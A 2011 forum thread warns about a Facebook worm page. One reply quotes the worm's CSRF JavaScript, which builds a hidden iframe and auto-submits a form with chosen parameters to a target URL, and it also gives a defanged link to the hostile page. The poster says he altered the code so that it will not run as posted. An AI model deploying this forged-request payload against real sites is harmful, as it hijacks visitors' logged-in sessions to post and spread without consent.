Bitcoin Forum

Other => Off-topic => Topic started by: BCEmporium on July 03, 2011, 11:31:31 PM



Title: XSS / CSFR Facebook hostile-page
Post by: BCEmporium on July 03, 2011, 11:31:31 PM
For people keeping wondering about XSS and CSRF, here's an example of what it can do. This example is a new Facebook worm, which spreads by pointing users at this page: hxxp://greatlolfacehot.com/ (link replaced with hxxp - Make sure you've Javascript disabled before you try it, then you can look at the source.

This is also a warning, just in case of a friend of yours had post some crap alike to his or your wall.


Title: Re: XSS / CSFR Facebook hostile-page
Post by: joepie91 on July 06, 2011, 05:16:49 PM
Sharing the part that does the CSRF here, for those who are interested...

Code:
function jacks(site,params){
var div = document.createElement('div');
div.innerHTML = '<iframe></iframe>';
document.body.appendChild(div);
var iframe = div.firstChild;
var iframeDocument = iframe.documentHandler;
iframeDocument.open();
iframeDocument.close();
var form = iframeDocument.createElement('form');
iframeDocument.body.appendChild(form);
form.setAttribute('action',site);
for (param in params){
var field = iframeDocument.createElement('input');
field.setAttribute('type', 'hidden');
field.setAttribute('name', param);
field.setAttribute('value', params[param]);
form.appendChild(field);
}
form.submit();
}
What this code roughly does is creating an iframe with a form that is set to a specific Facebook sharing URL (that is also called by their on-site sharing functionality), inserting a specific set of "parameters" (form fields) and corresponding values, and automatically submits the forum. This is all done in the background of course. The target URL and parameters can be specified in this function.

The code I posted here was edited to need some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.